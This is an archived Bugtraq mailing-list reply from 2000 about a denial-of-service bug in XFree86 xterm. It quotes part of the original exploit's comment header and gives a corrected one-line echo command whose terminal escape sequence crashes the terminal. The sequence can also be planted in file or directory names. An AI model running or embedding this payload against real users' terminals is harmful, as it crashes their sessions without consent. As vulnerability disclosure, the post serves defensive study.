Bugtraq mailing list archives
Re: [rootshell.com] Xterm DoS Attack
From: gone () GRAFFITI NET (Hans, Sebastian)
Date: Sun, 4 Jun 2000 18:35:27 +0200
/* * * xterm Denial of Service Attack * (C) 2000 Kit Knox <kit () rootshell com> - 5/31/2000 * * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
snip
* Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character) * inside files, directories, etc will have the same effect as this code. * */
I tried this with my xterm (XFree86 3.3.3.1b(88b)) - it didn't work. Substituting 65536 for 65535 did the job: echo -e "\033[4;65536;65536t" Sebastian Hans gone () graffiti net -- The light at the end of the tunnel is the headlight of an approaching train.
Current thread:
- Re: [rootshell.com] Xterm DoS Attack Hans, Sebastian (Jun 04)
- Security Update: serious bug in setuid() Technical Support (Jun 08)
- Security Bulletins Digest Aleph One (Jun 08)
- Internet Security Systems Security Advisory: Buffer Overflow in i-drive Filo (tm) software Aleph One (Jun 08)
- Re: [rootshell.com] Xterm DoS Attack Elias Levy (Jun 08)
- <Possible follow-ups>
- Re: [rootshell.com] Xterm DoS Attack Simon Tatham (Jun 06)
- Re: [rootshell.com] Xterm DoS Attack Michael Jennings (Jun 08)